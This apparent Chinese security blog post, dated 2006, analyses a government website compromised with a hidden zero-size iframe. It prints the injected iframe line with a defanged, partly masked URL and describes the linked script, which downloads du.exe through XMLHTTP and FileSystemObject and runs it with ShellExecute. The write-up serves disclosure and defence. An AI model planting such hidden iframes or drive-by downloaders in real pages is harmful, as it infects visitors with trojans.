又一个下载恶意文件的政府网站

无愠色

 关注

阅读 62

2022-12-12


endurer 原创

2006-08-22 第1版 

首页有3处地方被加入:
/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/

hxxp://***object.cnic**b.com/15   的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe 采用 nSPack 1.3  加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul

相关推荐

两个会自动下载恶意程序文件的政府网站

_刘彦辉 69 0 0

两个下载恶意程序文件的政府网站换花样了

书呆鱼 109 0 0

一个会下载 Trojan.DL.Agent.wzr 的政府网站

不会弹吉他的二郎腿 106 0 0

又一个带毒的网站(第3版)

caoxingyu 73 0 0

Faas,又一个未来?

小月亮06 53 0 0

下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站

潇湘落木life 27 0 0

又一个不错的ftp站点

忍禁 49 0 0

又一个新项目完结,炸裂!

罗蓁蓁 23 0 0

又一个ATAC分析的pipeline:PEPATAC

东方小不点 67 0 0

又一个换脸工具-swapface

早安地球 31 0 0

精彩评论(0)

0 0 举报